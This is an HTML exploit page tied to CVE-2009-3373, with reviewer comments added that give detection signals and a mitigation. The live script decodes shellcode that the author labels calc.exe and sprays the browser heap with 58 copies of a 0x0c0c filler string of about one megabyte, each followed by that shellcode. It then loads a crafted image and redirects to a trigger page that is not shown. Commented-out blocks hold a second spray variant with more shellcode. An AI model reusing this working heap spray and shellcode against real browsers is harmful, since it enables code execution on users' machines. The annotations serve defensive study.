CVE_2009_3373.htm
<!--
  Reviewer annotation (defensive analysis of this sample).
  The file name references CVE-2009-3373. This page holds the memory-preparation
  stage only: the script fills the script heap with many copies of one large
  string, the body loads 0c.gif, and the meta refresh moves on to trigger.htm.
  Neither 0c.gif nor trigger.htm is shown here, so their role is inferred.
  Detection signals visible in this file:
    - unescape() applied to long runs of %uXXXX sequences (binary data in a string)
    - a loop that grows a string of one repeated 16-bit value to about 0x100000 characters
    - dozens of copies of that string stored in an array
    - an automatic redirect to a second page right after the script has run
  Mitigation: run a browser release that contains the vendor fix for
  CVE-2009-3373 (fixed versions are not stated on this page; see the vendor advisory).
-->
<html>
<head>
<!-- Navigates to trigger.htm after 1 second, i.e. after the script below has run. -->
<meta http-equiv="refresh" content="1;url=trigger.htm">
<script>
//alert('ready to spray lol');
// calc.exe shellcode
// (author's label above; the bytes are not analysed in this review. They are
// stored as %u-escaped 16-bit units and decoded to a string by unescape().)
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
// Seed of the filler string; the loop below appends the 0x0c0c pattern to it.
var ret = unescape("%0c0c%u0c0c");
//var ret = unescape("%u9090%u9090");
// Target length of one filler-plus-shellcode string, in string characters.
var chunksize = 0x100000;
// Number of copies stored in the array below (0x3A = 58).
var chunknumber = 0x3A;
// Author's note (translated from Italian): ret initially has length 2 and I
// must make sure it does not exceed chunksize.
// The loop appends two more filler characters per iteration until ret reaches
// chunksize minus twice the shellcode length minus 8.
while(ret.length < (chunksize - (shellcode.length*2) - 8)) ret += unescape("%u0c0c%u0c0c");
//var payload = ret + shellcode + ret + shellcode + ret + shellcode + ret + shellcode;
// One payload = the long filler run followed by a single copy of the shellcode.
var payload = ret + shellcode;
// substring(0, length) spans the whole string, so the content is unchanged.
payload = payload.substring(0, payload.length);
//alert(payload.length)
//heap = new Array();
// `heap` and the loop index `i` are assigned without var, so both are implicit globals.
heap = [];
//alert("ano");
// Stores chunknumber entries, each produced by joining a one-element array.
// NOTE(review): presumably this is meant to give every slot its own copy of the
// string rather than a shared reference; engine behaviour is not visible here.
// For monitoring, the observable effect is a burst of large, identical string
// allocations from a single page.
for(i = 0; i < chunknumber; i++)
{
heap[i] = [payload].join("");
//heap[i] = payload.substring(0, payload.length);
//var test = heap[i];
//alert("Sprayed " + i + " di lunghezza " + test.length);
}
// The two block comments below are disabled experiments left by the author;
// none of it executes.
/*
//test
for(S="\u0a0a",k=[],y=0;y++<300;)y<20?S+=S:k[y]=[S.substr(50)+"\uf631\u6456\u768b\u8b30\u0c76\u768b\u8b1c\u086e\u368b\u5d8b\u8b3c\u1d5c\u0178\u8beb\u184b\u7b8b\u0120\u8bef\u8f7c\u01fc\u31ef\u99c0\u1732\uc166\u01ca\u75ae\u66f7\ufa81\uf510\ue2e0\ucf75\u538b\u0124\u0fea\u14b7\u8b4a\u1c7b\uef01\u2c03\u6897\u652e\u6578\u6368\u6c61\u5463\u0487\u5024\ud5ffÌ"].join("")
alert("Sprayed automtic");
*/
/*var c = document.createElement("img");
c.src = "06.gif";
var a = document.createElement("img");
a.src = "0a.gif";*/
//var b1 = document.createElement("img");
//b1.src = "0c.gif";
</script>
</head>
<body>
<!--<img src="a_original.gif">-->
<!--<img src="a.gif">-->
<!-- The only active element in the body. NOTE(review): 0c.gif is not part of
     this page; given the file name it is presumably the crafted image tied to
     the CVE. Treat the image and trigger.htm as part of the same sample set. -->
<img src="0c.gif">
</body>
</html>